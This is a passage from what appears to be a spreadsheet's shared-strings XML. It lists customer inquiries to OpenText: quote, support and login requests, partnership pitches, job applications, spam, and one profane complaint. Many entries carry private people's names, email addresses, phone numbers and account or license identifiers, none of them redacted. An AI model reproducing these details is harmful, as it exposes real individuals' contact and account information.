    <t>I want to resign my Hightail account. Please give me step by step the instruction how I can do it ! My hightail-number is: 669-222-8281</t>
  </si>
  <si>
    <t xml:space="preserve">INQUIRY FOR ERIKA ANN PANGANIBAN LANTO / OPENTEXT PHILIPPINES_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>apply for the post of accountant or cashier or (i.t) executive officer. please take visa for me regards</t>
  </si>
  <si>
    <t>job seeker</t>
  </si>
  <si>
    <t>I want to know more about your auto redaction tool</t>
  </si>
  <si>
    <t>Not interested in any of your Spam. Remove asap.</t>
  </si>
  <si>
    <t>I would like a quote for Encase Endpoint Security and Encase Endpoint Investigator</t>
  </si>
  <si>
    <t>Looking for a quote of OpenText Exstream</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for a quote for Exceed Hummingbird. _x000D_
</t>
  </si>
  <si>
    <t>How can i use opentext sentiment analysis?</t>
  </si>
  <si>
    <t xml:space="preserve">Good afternoon. I need to know if your scanning software allows integration with QuickBooks because I need a quotation as soon as possible, but that's a requirement for the company. Please, feel free to contact me by email. </t>
  </si>
  <si>
    <t>I am requesting an updated copy of your W-9 for our records.</t>
  </si>
  <si>
    <t>may I order all product invoices which I have purchased</t>
  </si>
  <si>
    <t>What do I need to fill out to provide individuals access to support site?</t>
  </si>
  <si>
    <t>Would like any additional information on the AppXtender product. I have a GP client interested in AP Automation.</t>
  </si>
  <si>
    <t>We use the iOS app frequently. When users upgrade to iOS 12 the app is very slow and unresponsive. Is there an update coming soon?</t>
  </si>
  <si>
    <t>I am interested in an Enterprise search with Exchange integration.</t>
  </si>
  <si>
    <t>Hi!  A client of mine is asking me to build an integration between their system and Open Text Content Server 16.  How can I get a development copy of this product to work against?</t>
  </si>
  <si>
    <t>Could you please provide pricing and specs for eDoc plug-in.  We already have the OpenText platform.  Thanks!</t>
  </si>
  <si>
    <t xml:space="preserve">Tried to log into Guidance to update my account for EnCE renewal.  My account no longer exists.  Please help.  </t>
  </si>
  <si>
    <t>I'd like to be able to login at the support site with my internal OpenText email account.</t>
  </si>
  <si>
    <t xml:space="preserve">We are currently on RightFax 10.6 and we need to upgrade to version 16.  We need guidance on making this transition.  Can you please give me a call to start this process?_x000D_
_x000D_
Thank you, _x000D_
_x000D_
Erik Lindstrom </t>
  </si>
  <si>
    <t>I am looking for a management system that will be able to easily and efficiently handle documents with our organisation. OpenText solution seems to be the ideal solution so wanted to know if one can have a trial on it.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We have a customer who needs na OCR solution for invoice entry automation._x000D_
Do you have that kind of solution based on zonal customizable OCR?_x000D_
Do you sell in Portugal?_x000D_
_x000D_
best regads _x000D_
Filipe Barreira_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning.  Is Open Text eDOCS Email Filing version 4.3.140 compatible with Win10?_x000D_
</t>
  </si>
  <si>
    <t>AAAAAAAA內容AAAAAAAAAA</t>
  </si>
  <si>
    <t>I want to use a file sharing program...where do I download this one?</t>
  </si>
  <si>
    <t>Open Text Content Analytics bzw. Sentiment Analyse verfügbar als Tool?</t>
  </si>
  <si>
    <t>After logging in the support site with saumitra.sharma@hdfcbank.com (authorized email) it gives me an error as access denied. Can you help at the earliest as we want to raise a support ticket.</t>
  </si>
  <si>
    <t>Request for partnership_x000D_
Softline is a leading global Information Technology solutions and services provider focused on emerging markets such as Eastern Europe, Central Asia, Americas, and Asia. We help our customer achieve digital transformation and protect their business with cybersecurity technologies. Our services include end-to-end technology solutions, public and private clouds, software and hardware provisioning and broad array of associated services. Softline company in Kazakhstan – the regional representative office has been open in the spring of 2004 in the city of Almaty. In 14 years of the presence in the Kazakhstan market, five more representations that have allowed capturing all regions of Kazakhstan fully have been open. Today we have head representation to Almaty, regional representative offices in Astana, Karaganda, Aktobe, Atyrau, Shymkent._x000D_
We have several customers in Kazakhstan and they have a need for decisions of your company. _x000D_
We could represent your interests in the territory of the Republic of Kazakhstan as the partner in a part of realization and delivery of decisions directly to customers. _x000D_
Do you have a partner network and requirements to partners?</t>
  </si>
  <si>
    <t>We would the trial of Hummingbird FTP. We need to convert Unix files to .txt files.</t>
  </si>
  <si>
    <t>I installed open text socks client in my local machine and I am not able to connect to the server. I tryied in another system and it is working.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team_x000D_
On behalf of the Organizing Committee of Plant Science Congress, we are pleased to invite you to the World Congress on Plant Genomics and Plant Science which is going to be held during November 23-24, 2018 at Bangkok, Thailand._x000D_
As a prominent company with vast experience in Agri and its allied areas, we are looking forward to having your participation and presentation in our conference where we can have Interactive scientific Sessions and collaborations with experts from more than 25 countries from Europe, USA and Asia-Pacific regions. For further Details please contact me._x000D_
</t>
  </si>
  <si>
    <t>Do you have a standalone solution we can deploy post incident to help determine if a breach has occurred ...could you please call to discuss asap - in the longer term we are also interested in comparing your product suite against Nuix for Ediscovery and for performing disk and process level forensics and remote disk capture etc._x000D_
_x000D_
Thanks_x000D_
_x000D_
Toby Henderson</t>
  </si>
  <si>
    <t>Hallo,_x000D_
wir sind aktuell auf der Suche nach einer Template App für Salesforce. Aktuell nutzen wir Visualforce. Die 2 größten Punkte für einen Wechsel ist die eingeschränkte Möglichkeit, das Angebot ansprechend zu gestalten sowie der sehr hohe Zeitaufwand bei Anpassungen. _x000D_
_x000D_
Anforderungen: _x000D_
* PDF-Ausgabe_x000D_
* PDF als Datei am Objekt speichern_x000D_
* Lightning Experiance_x000D_
* Mehrsprachigkeit	_x000D_
* Abhängigkeiten müssen möglich sein (z.B. wenn Feld Betreiberwechsel = TRUE, dann Textbaustein B)_x000D_
* Optisch ansprechend (Farbe, fett….)_x000D_
* Anpassungen mit geringem Aufwand_x000D_
* Seitenanzahlen_x000D_
* ggf. Logiken abbilden (Tilgungsplan)_x000D_
_x000D_
LG_x000D_
Ursel Schreiner</t>
  </si>
  <si>
    <t>Hello _x000D_
We want to be your partner in Turkey.  I'd like to learn the your conditions and the procedures._x000D_
I expect your help on this._x000D_
_x000D_
Thank you_x000D_
Best regards._x000D_
_x000D_
Murat</t>
  </si>
  <si>
    <t>Now we are in feasibility study to implement ECM and Opentext is very interesting _x000D_
_x000D_
Please provide us full list of your partner in Thailand then we can contact and move to next step.</t>
  </si>
  <si>
    <t>Planning to implement Open Text for SAP and Non SAP documents management.</t>
  </si>
  <si>
    <t>Hello, _x000D_
I read about Notes Composer and I'm interested in it.</t>
  </si>
  <si>
    <t>Back pay</t>
  </si>
  <si>
    <t xml:space="preserve">Hello - can Deloitte resell Opentext? If so, how do i obtain pricing? </t>
  </si>
  <si>
    <t>Upgrade of Server Hardware</t>
  </si>
  <si>
    <t xml:space="preserve">Advertisement </t>
  </si>
  <si>
    <t>UNM Hospital is currently an "Easylink" user (sending patient appointment reminders), but - the version they're currently using will only make voice calls.  They want to move to a product that will also send text messages....and my hope is that now that you've merged, that you might be able to provide a migration path from "voice messages" to "text messages" for those same patient reminders.  I'm assuming that there's already an assigned account manager for UNM Hospital - please have that person contact me ASAP._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Michael Schalip_x000D_
Mgr, UNM HSC CIO's Office - PMO</t>
  </si>
  <si>
    <t>Currently using ApplicationXtender / Kofax document capture solution.  Would like to discuss upgrade to new technology.</t>
  </si>
  <si>
    <t>I have experience and i have  communication skills</t>
  </si>
  <si>
    <t>I am looking to confirm if the OpenText Enterprise Connect plugin is supported in Microsoft Office 365 ProPlus version 1803 please.</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: University Internship_x000D_
_x000D_
Dear Sir or Madame,_x000D_
 _x000D_
I am a third year University van Amsterdam student and I would like to complete my mandatory university internship at OpenText._x000D_
This fall I will graduate on the topic "Multi-language source code formatters" however in order to graduate I need to complete a 168 hour internship. Though it needs to be 168 hours, I would love to help out as long as possible._x000D_
 _x000D_
I have experience working with network security and managing network architectures in small and medium sized businesses, I enjoy tinkering with virtual machines and operating systems, I have previously used Linux (Docker), DOS and Window, also have previous experience with data analysis and machine learning.  I have a strong background in applied mathematics and programming languages. I am comfortable working with C++, Python and Rascal, however I am very excited to learn new things and build upon my previous knowledge._x000D_
I have interned for both Dutch and Macedonian companies and NGOs where I have gained skills in IT, human resources and organization. I have followed classes such as modern databases, machine learning, modeling real life problems, dynamical systems and many other classes in computer science, mathematics and some in economics and anthropology. The wide variety of classes I have chosen gives me a broad overview of issues and competences, how to manage and solve them._x000D_
The internship needs to be in November and I do not need to be paid._x000D_
This would be a big opportunity for me to learn more about software and network architecture development, how to optimize programs and tend to the customers needs._x000D_
I would be honored if you would give me an opportunity to learn from you and contribute to the company at the same time. I have also attached my CV to this email, thank you for your time and hope on hearing from you soon._x000D_
Kind regards,_x000D_
Frosina Cvetkoska_x000D_
</t>
  </si>
  <si>
    <t>Demo / Information on electronic filing options for HR purposes</t>
  </si>
  <si>
    <t>MV</t>
  </si>
  <si>
    <t>aa传说中的龙吃魔豆aaazzzz</t>
  </si>
  <si>
    <t>_x000D_
Hello,_x000D_
_x000D_
We are in need of a W9 form for GXS, Opentext._x000D_
_x000D_
Please complete and return via email amigliaccio@duraplastics.com or fax 951-845-7644 Attn: Alyssa._x000D_
_x000D_
Thanks,_x000D_
Alyssa Migliaccio_x000D_
Accounts Payable</t>
  </si>
  <si>
    <t>Hi,_x000D_
We are a startup IT company providing software development services to our clients in South Africa &amp; India. We are currently providing development services in OpenText process suite 16.2 to our esteemed clients in Western Cape._x000D_
_x000D_
We would like to be partner with OpenText._x000D_
_x000D_
Kindly assist._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t>Request quote</t>
  </si>
  <si>
    <t xml:space="preserve">I need the job </t>
  </si>
  <si>
    <t xml:space="preserve">We already have an account with you all through fax2mail. The account is delinquent and I am trying to change the credit card information but am unable to do so. There is a broken link in the billing portion of the website. Please assist. </t>
  </si>
  <si>
    <t>Begin discussions around preliminary pricing for Enterprise Content Management</t>
  </si>
  <si>
    <t>I need access to your KBA and support areas._x000D_
Thanks,</t>
  </si>
  <si>
    <t xml:space="preserve">We have licenses obtained for Application Xtender for use with Ellucian's Banner.  I am seeking Technical Support for installation.    Could you tell me if I can obtain support from Opentext??_x000D_
</t>
  </si>
  <si>
    <t>Please provide me the silent install string for Business Capture Center 16.3</t>
  </si>
  <si>
    <t>Change my email from gary.tickle@rrd.com to gary.tickle@lsccom.com. We still have 2 instances of VistaPlus 5.52 installed. Need username and password fixed to be able to log into support.</t>
  </si>
  <si>
    <t xml:space="preserve">Our office is supporting an Industry Day for Market Research for the Air Force Publications Reduction initiative on Oct 2/3 and would like to contact a representative of OpenText to discuss the event. </t>
  </si>
  <si>
    <t>I am already registered from years for Streamserve support._x000D_
But now a Registration connfirmation is systematically requested and I can't get any support._x000D_
In the past I had also access to knowledge opentext for StreamServe._x000D_
ould you help me please?</t>
  </si>
  <si>
    <t>Dear sir/madam,_x000D_
_x000D_
I am Michel in Kenya. I would like to let you know that in my country from the port to the city Nairobi, all the LPG gas is transported by road. _x000D_
I  want to use the pipeline to do this. I would like to bring in expertise so that we can dry the pipeline of diesel and petrol using dry vacuum pumps then pump the LPG, AVGAS,JET FUEL e.t.c. and help save alot of time, accidents and money._x000D_
_x000D_
I would want to know how to go about this with your company._x000D_
_x000D_
Regards,_x000D_
Michael Mwaura</t>
  </si>
  <si>
    <t>I need a POC for Gov't sales.  Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">Developing SAP S/4 Hanna system for Utilities. Interested in implementing OpenText Extreme to produce customer invoices for municipalities. </t>
  </si>
  <si>
    <t>I need to know the pricings of the Opentext  Teleform software</t>
  </si>
  <si>
    <t>Pearson is the world's learning company, with 35,000 employees across 70 countries worldwide. Our unique insight and world-class expertise comes from our long history of working closely with teachers, learners, researchers, authors, and thought leaders. Our products and services are used by millions of teachers and learners around the world every day.  _x000D_
_x000D_
The way the world learns is changing, and we're changing too, expanding our focus from educational publisher to the world's learning company. _x000D_
_x000D_
We are in process of indentifying a potential supplier for an invoice scanning/ data capture project.  _x000D_
_x000D_
Could you please connect us to the contact person in your team to take this forward?</t>
  </si>
  <si>
    <t>Looking at QMS solutions for Quality Group</t>
  </si>
  <si>
    <t>Looking for an EDMS solution.</t>
  </si>
  <si>
    <t>I have already purchased an EnCase Annual Training Passport, please can you tell me how I sign up for an OnDemand training course through your website? Many thanks. Lisa</t>
  </si>
  <si>
    <t xml:space="preserve">Hej!_x000D_
_x000D_
Jag arbetar på Deloittes skatteavdelning och fick höra från en av våra konsulter att ni önskar byta till en digital fakturaadress i Kanada men fick ingen mailadress att kontakta. Återkom gärna med adressen ni vill byta till så ser vi till att fixa detta._x000D_
_x000D_
Tack på förhand!_x000D_
_x000D_
Med vänliga hälsningar,_x000D_
Julia Gerdau_x000D_
Billing &amp; CEA Specialist | Tax &amp; Legal _x000D_
Deloitte AB _x000D_
113 79 Stockholm _x000D_
Besöksadress: Rehnsgatan 11 _x000D_
</t>
  </si>
  <si>
    <t>I’m the services manager of Cisco Qatar and would like to talk to someone who is in charge of the business there.</t>
  </si>
  <si>
    <t xml:space="preserve">been trying to submit form to get a trial of open txt nfs client never submits. </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
Could you please urgently guide me to your reseller here in Saudi Arabia? I tried to contact ITS-2 but the contact listed on your website for ITS-2 is not responding._x000D_
_x000D_
Thanks,_x000D_
Ismail</t>
  </si>
  <si>
    <t>One of our clients is implemeting MS Dynamics 365 and wants to integrate with a content management system. They currently have OpenText Content Server 10 and prefer to use this, but are looking at SharePoint as an alternative. It seems that they would have to acquire Extended ECM and NOT  their current Content Server 10. Please advise and provide a recommendation of the best solution for this integration.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi All,_x000D_
_x000D_
We have to deliver the training one for our customer in October and any VM for the trainings for Exstream 16.4_x000D_
_x000D_
Thanks._x000D_
_x000D_
Regards,_x000D_
Alicia_x000D_
</t>
  </si>
  <si>
    <t>Invoice Queries on going since May 2018_x000D_
Tried to contact someone regarding this since June 2018 and getting no where fast.  Now have 3 Invoices in Query. No longer using system since Mid May 2018, so need this canceling &amp; credits issued for the Invoices.</t>
  </si>
  <si>
    <t>please get the account manager to call me, i require new licenses for documentum &amp; captiva</t>
  </si>
  <si>
    <t>BPM Opportunity</t>
  </si>
  <si>
    <t>Looking for Teamsite Training options at our Hyderabad office for two of our employees. Please treat this is an urgent request._x000D_
_x000D_
Thanks in advance!</t>
  </si>
  <si>
    <t>QUOTATION FOR RENEWAL</t>
  </si>
  <si>
    <t>Request for information and call regarding Capitva. We are a scanning bureau and are looking to change our scanning and data capture system.</t>
  </si>
  <si>
    <t>Angebot für OnSite Schulung. Wie würde eine 5 tägige OnSite Schulung abgerechnet werden?</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
We have Data Science with Python Trainings held in Singapore on 1st October 2018._x000D_
_x000D_
So let me know if your company employee’s would be interested to take up this course so we could get back to you with some more detail._x000D_
_x000D_
Looking forward to hear from you soon… _x000D_
_x000D_
Best Regards,_x000D_
Syed Azhar | Sales Executive_x000D_
Agilitics Pet Ltd_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi there,_x000D_
I would like to have a quote on the following items which I understand that your company supplies. Pls quote me a good reseller price on the following items_x000D_
4 sets of Tableau TX1 Forensic Imager Kits with Adapter Kit and PCIe-IDE Adapter_x000D_
Pls advice lead time requirement and approx freight cost. Look forward to hear from you soon. Cheers_x000D_
</t>
  </si>
  <si>
    <t>Dear All,_x000D_
_x000D_
I am trying to register in the developer area but I always get_x000D_
_x000D_
POST registrationservice v1 accountrequests 404 (Not Found)_x000D_
_x000D_
Can you please help with that?_x000D_
_x000D_
 Best Regards,_x000D_
_x000D_
Tarek Eladly</t>
  </si>
  <si>
    <t xml:space="preserve">Teamsite  Admin training through web. need some details urgently.           </t>
  </si>
  <si>
    <t>We are for Teamsite Admin  Training for 2 our Associates through ONLINE. Can you please give some details.</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
_x000D_
My department currently have several digital forensic software and 2 of them is Encase Forensic 6._x000D_
_x000D_
Both of these software comes with a dongle each. _x000D_
_x000D_
I want to understand from you if there’s an option to upgrade the current version to the latest? Or we need to purchase a new software? _x000D_
_x000D_
Thanks. _x000D_
_x000D_
Best Regards,_x000D_
Danny Soh</t>
  </si>
  <si>
    <t>DMS RFP Contact Info</t>
  </si>
  <si>
    <t>Do you have a trial version for this?</t>
  </si>
  <si>
    <t>Supporting a client in vendor/solution selection. Require demonstration and commercial submission for forthcoming RFP. Client is an energy industry owner/operator about to commence a major capital project and requires document &amp; information management capabilities.</t>
  </si>
  <si>
    <t>my customer has purchased gupta report builder with delivery number 8000008782 and SUID 54674-12448. How can my customer access to Open text and download the license?</t>
  </si>
  <si>
    <t>We currently use Actuate Version 11 SP1 (Build 110C110326) and have used Actuate Professional Services to implement RSSE.  I'm interested in potentially modifying our RSSE code so that users don't need to enter in a password and use Single Signon instead.  If possible, I would like Acuate to use the user's current network ID to retrieve the user's employee ID (stored in Active Directory, and can be stored in a SQL table), and then log onto Actuate using the employee ID.  The roles for the user in Actuate would still be retrieved using the code in place, checking against an existing PeopleSoft table.  Can I speak with someone to see if this is possible?  _x000D_
_x000D_
Thanks,_x000D_
Rich</t>
  </si>
  <si>
    <t xml:space="preserve">I received a HighTail email today about how you have a system that helps agencies and marketing departments in the creative process.  It dawned on me that my company has a tool that would complement the HighTail/OpenText platform.  We've worked with over 600 brands in only 6 years of existence.  I would love to speak with the leader of business development or product development or partnerships.  Thank you. </t>
  </si>
  <si>
    <t>Good day,  I use a scanner HP Scanjet 8270 and EMC Captiva ISIS Twain drivers 1.0 which came with the scanner.  Since I upgrade to last version of Windows 10 I cannot use that software.  Is there any update ? If not how much it cost for a new software ?</t>
  </si>
  <si>
    <t>We currently have at least one account, 122035734891. We are beginning to distribute another brand in the coming weeks so we will need to set up another catalogue within OpenText as the GTIN prefix for the new brand is invalid under our current account. I do not know the process for this. Please can you help with setting this up?_x000D_
_x000D_
Thank you!</t>
  </si>
  <si>
    <t>Magnetar had a contract for software support with iManage for what is now the LiquidOffice product and have been advised to reach out to you for continued support etc</t>
  </si>
  <si>
    <t>we need part 11-compliant document control system with small footprint.  &lt;5 people in company. need value.</t>
  </si>
  <si>
    <t>Interested in a stand alone conflict solution which can integrate/search other databases/softwares.</t>
  </si>
  <si>
    <t>I have requested for you to not send email to this address and to switch to ryockel@aol.com.</t>
  </si>
  <si>
    <t>Hello,_x000D_
We are looking at Birt as a tool for some reporting purposes._x000D_
However, we see that not much updates have happened after 2017 and even a minor version took a year to come out. Please let us know if the updates to open source and commercial version are still on the roadmap and your company is committed to it, so that we could take the right decision on the tool._x000D_
Expecting your earliest reply._x000D_
thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">I will like to know if infocenter desktop client is windows 10 compatible </t>
  </si>
  <si>
    <t>Exploring EDI solutions, would like to know if you are already integrated with Sales API to send via webservices EDI files format X12 204, 210, 214 and 990. Cost related to migrate to your solution and setup approx 110 trading partners.</t>
  </si>
  <si>
    <t>Looking for quote to acquire Exstream licensing for 2 locations with failover.   I need this ASAP.  Thank you!</t>
  </si>
  <si>
    <t>Looking for an on prem faxing solution.  We currently use Cisco CUCM 11.5 with SIP trunks to ISP for all inbound and outbound calling</t>
  </si>
  <si>
    <t>Brava Enterprise 7.0 replacement</t>
  </si>
  <si>
    <t>Hubbell is still facing the issue of uninstalling VIM out of our SAP environment.  The last support we received was to upgrade to version 16.3 and then uninstall.  We tried that but failed due to no license.   We don't know if a temp license can be provided.  Also, it has been stated that our existing VIM can be uninstalled in our current environment using the SAP SAINT tool if we upgrade to 7.5 SP8 or 7.5 SP9.   Is this a true fact?   If so, when will these service packs be available for download and can I download them?_x000D_
_x000D_
Thanks for your support.    Arnie</t>
  </si>
  <si>
    <t>Hi,_x000D_
My company was first interessed in STREAMSERVE software, but may deploy EXSTREAM software too. I am looking for technical specifications (like prerequisites and installation guide if possible) in order to initiate an IT Architecture review</t>
  </si>
  <si>
    <t>I need to find who is our training coordinator, and also need to get a Training History Report for my employees.</t>
  </si>
  <si>
    <t>To request pricing for document management services</t>
  </si>
  <si>
    <t>Hello, I need to purchase OpenText Gupta Report Builder 4.0, I canot see a way to do this. I need this version, due to a software that we use, we need to edit QRP. Can you help Me?</t>
  </si>
  <si>
    <t>We are a managed services provider with a customer who has an on premises instance of Opentext  eDOCS.  They are interested in moving to a cloud solution.  I would like to obtain information on the costs for your subscription model and implementation/migration.</t>
  </si>
  <si>
    <t>Greetings,_x000D_
_x000D_
We are interested in your technology (RecoStar), and would_x000D_
like to learn more about it. I'm currently collecting information_x000D_
about few ICR solutions, for hand-written data extraction from_x000D_
forms._x000D_
_x000D_
So, I would like to know how efficient your technology actually_x000D_
is (speed, success rate...), the technical specification, to properly_x000D_
run your solution. Then, how does the solution give us the output_x000D_
from the form. Finally, is it possible to get a trial version? Feel free_x000D_
to add any information to those requested._x000D_
_x000D_
Regards,_x000D_
_x000D_
-- _x000D_
Anthony Truong_x000D_
Intern at Société Générale</t>
  </si>
  <si>
    <t>Introduction of the Ninja RMM Platform</t>
  </si>
  <si>
    <t>zzzzzz内容xxxxxx</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I understand that ANXE business corp changed their name to open text. They gave me an email to send tax exemption forms but when I forwarded Woodbridge's tax exemption form, the email I sent it to didn't exist. The email that was given to me was usindirect.tax@opentext.com.  Can you please give me an email whether it is accounts receivable or the correct email to send tax exemption forms. I want to make sure that whenever Opentext invoices Woodbridge, that we are not charged sales tax. _x000D_
_x000D_
Please reply as soon as possible._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Gonzalo Antonio</t>
  </si>
  <si>
    <t xml:space="preserve">We are beginning an effort to upgrade all our existing application servers off of Windows 2008, ideally over to Windows 2016.  Also, we need to upgrade our SQL servers to the newest available version (that's compatible with the application)._x000D_
_x000D_
For our application Captiva Capture (InputAccel), we are currently running v7.1._x000D_
_x000D_
What is the process to begin discussions around potentially upgrading our application system?  </t>
  </si>
  <si>
    <t>Comprar seus produtos URGENTEMENTE._x000D_
21 991 858 144, 21 969 533 789</t>
  </si>
  <si>
    <t>Whats about the new Oracle Java Life Cycle and support contracts from the perspective of Teamsite embedded Oracle Java Runtime?_x000D_
Will be the Teamsite Java Runtime changed to OpenJDK in the near future?_x000D_
Does Opentext cover the Oracle Java License costs for the Teamsite product?</t>
  </si>
  <si>
    <t>Which product to work on.._x000D_
Need OTMM as backend and develop customized UI over it.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
_x000D_
One of our customers has just switched to the cloud (Office 365) and he wants to do the same for the 2 fax lines he currently has, can you send me more information about RightFax for Office 365 (configuration, prerequisites, offer......)_x000D_
_x000D_
Best regards,_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">New PO number for FY19. _x000D_
Please use PO number 4500001513 from 2018-10-01_x000D_
_x000D_
Best regards_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">we would like  to learn teamsite admin </t>
  </si>
  <si>
    <t>MG</t>
  </si>
  <si>
    <t xml:space="preserve">Your feedback is much appreciated, this is our 3rd reminder,no one has responded to our request. Thanks for your attention on this, </t>
  </si>
  <si>
    <t>Please, provide me with a list of your local partners in Saudi Arabia.</t>
  </si>
  <si>
    <t>Request for your product demo - documents OCR and documents reader</t>
  </si>
  <si>
    <t>Hi, Could you tell me if there are any spaces left on the DF120 - Foundations in Di  English  GSI-Reading starting on October the 30th this year?_x000D_
Best Regards_x000D_
_x000D_
Malcolm Nicholls</t>
  </si>
  <si>
    <t xml:space="preserve">Keen to understand Opentext OCR solutions for a heterogeneous ERP landscape </t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
aus geschäftlihen anlass wollte ich gerne das Addin pentext Core nutzen, welches mir ermöglicht im Opentextbrowser direkt eine Datei zu öffnen, um diese zu bearbeiten im entsprechenden Programm (Office Word/Excel)._x000D_
_x000D_
Wie kann ich dieses Addin erhalten ? Sollte es ein Downloadlin gebe, könnten Sie mir diesen zusenden._x000D_
_x000D_
Vielen Dank und schöne Grüße_x000D_
V. Steigerwald</t>
  </si>
  <si>
    <t>Re: Website Issues...?_x000D_
_x000D_
Hello_x000D_
_x000D_
My name is Jessica and I am a Digital Marketing Specialists for a Creative Agency._x000D_
_x000D_
I noticed a few technical errors which correspond to a drop in website traffic over the last 6-8 months which I thought I would bring to your attention._x000D_
_x000D_
After closer inspection, it appears your site is lacking in 4 key criteria._x000D_
_x000D_
1- Website Speed_x000D_
2- Link Diversity_x000D_
3- Domain Authority_x000D_
4- Competition Comparison_x000D_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Name, company’s website address (mandatory) and /or phone number._x000D_
_x000D_
Regards,_x000D_
Jesscia Carner_x000D_
jessicacarnerseo@gmail.com</t>
  </si>
  <si>
    <t>Hello._x000D_
_x000D_
I would like to know how much does it cost the service of the Open Text teleform platform. I need a service where the machine can read the text and classifcate information. _x000D_
_x000D_
Kind regards, _x000D_
_x000D_
Núira</t>
  </si>
  <si>
    <t xml:space="preserve">I have just attended Encase 2 (Building an investigation - Reading) and am booked onto the Ence exam prep course in November.  We are in the process of obtaining Encase 8 licences but have been told that we can get a trail licence as I have attended an Encase course.  How do I go about getting this?  </t>
  </si>
  <si>
    <t xml:space="preserve">Who do I have to fuck to get any trouble shooting service from you???????????????  Tried over and over again and get you fucking useless case #, the morons ask for a screen cap, which I send and then they ignore it and no more contact.  Anyone awake over there??????????????????????????  I'm sick of this crap.  Been a customer for a longtime but this is bullshit.  You gonna help me or what????????????  And no apologies for the language, this is what you drive people to by not giving them any service.  Fucking fix the problem assholes!_x000D_
</t>
  </si>
  <si>
    <t>training details required</t>
  </si>
  <si>
    <t>i am looking for the account manager handling fuji xerox.</t>
  </si>
  <si>
    <t xml:space="preserve">Would you send me a quote for a private class on EnCase Endpoint Security for installation and integration? The site is at the end-user' in Seoul for the actual process of installation and integration. So the quote should include instructor's travel costs to Korea. _x000D_
_x000D_
Your prompt response would be appreciated as this end-user is going to place an order shortly. _x000D_
_x000D_
Thank you. _x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
I am working for a client who is interested in integrating OCR software into a Blue Prism process. Does OpenText have connections/API to Blue Prism? And is it possible to get a trial of OpenText OCR to assess it's suitable?_x000D_
_x000D_
Thank you,_x000D_
_x000D_
Jon</t>
  </si>
  <si>
    <t>Please cancel my service and do not Bill my card any longer._x000D_
_x000D_
Thank you _x000D_
Jim Roberts_x000D_
Cre8yiu@aol.com_x000D_
_x000D_
Customer also has the option of canceling your subscription at any time by giving thirty (30) days’ written notice. In the event of such termination, you will lose all data related to your subscription. Customer is solely responsible for implementing appropriate measures to periodically backup data related to its subscription.</t>
  </si>
  <si>
    <t>Please cancel my service and do not bill my account any longer._x000D_
Thank you _x000D_
Jim Roberts_x000D_
cre8you@aol.Com_x000D_
_x000D_
Customer also has the option of canceling your subscription at any time by giving thirty (30) days’ written notice. In the event of such termination, you will lose all data related to your subscription. Customer is solely responsible for implementing appropriate measures to periodically backup data related to its subscription.</t>
  </si>
  <si>
    <t>Dear Sir/Madam,_x000D_
I want to offer myself as candidate for a job at your company.</t>
  </si>
  <si>
    <t>Hi OpenText,_x000D_
_x000D_
Any update regarding my questions on Authorized Reseller in Malaysia?_x000D_
_x000D_
Hope to hear from you soon._x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t>Need to discuss faxing solutions.</t>
  </si>
  <si>
    <t>My name is Daniel. I am the Owner of Illicit Designs, and I specialize in LED flooring for weddings, corporate events, etc. I came across your profile and would love to connect and chat further about us potentially working together on future events! _x000D_
_x000D_
Thank you for your time,_x000D_
Daniel Bahia</t>
  </si>
  <si>
    <t>10- user licenses</t>
  </si>
  <si>
    <t xml:space="preserve">We have a problem. But Just Android systems. Error message is : generic error (4) </t>
  </si>
  <si>
    <t>I am interested in purchasing Brava Reader and want some questions answered</t>
  </si>
  <si>
    <t>I need a quote generated (for our new year budgeting) for 3 online training subscriptions.  These subscriptions will be for U.S.-based English-speaking employees supporting the Content Server 16  product suite.  Please provide U.S. address and contact info with quote. -Thanks</t>
  </si>
  <si>
    <t>Hello OpenText:_x000D_
_x000D_
We had got a support contract until 2009 for Gupta, but we no download in those days Team Developer VS 5.1._x000D_
_x000D_
Our legacy applications (compiled with Gupta 3.0) have an issue that can not print to network printers  directly, we have to install a local printer with lpt1 and map lpt1 to network for printing. We want to solve it and avoid creating local printing with lpt1 redirect, our option is to compile our applications with gupta 5.1 which we had support and test it._x000D_
_x000D_
I appreciate your comments._x000D_
_x000D_
Regards._x000D_
Mario Garcia._x000D_
+5114376767 extension 31310_x000D_
mario@ulima.edu.pe</t>
  </si>
  <si>
    <t>Trial License.  I downloaded one for my win7 pc and it worked.  Can I get a trial lic for my Win10 PC?</t>
  </si>
  <si>
    <t>I need help to understand the solution of RightFax connected to VOIP IP in the company, I need to route and connect local number (Costa Rica) and receive fax from customers.</t>
  </si>
  <si>
    <t>I want deployer for team developer 7.1</t>
  </si>
  <si>
    <t>2 questions.._x000D_
Why am I not receiving email confirmation when a file is received OR confirmation when a file has been sent?_x000D_
Also, the files are transporting (we think) much quicker than usual. Is this OK and are all my files going through?</t>
  </si>
  <si>
    <t>We are locked out of our account and have reset the password. We are not receiving the email where we can reset the password. Can we update the contact for where this email is being sent?</t>
  </si>
  <si>
    <t xml:space="preserve">Good day,_x000D_
 _x000D_
My name is Cody and I work for ENGIE Insight on behalf of Shell Oil.We are the company authorized by them to handle all of their billing. _x000D_
 _x000D_
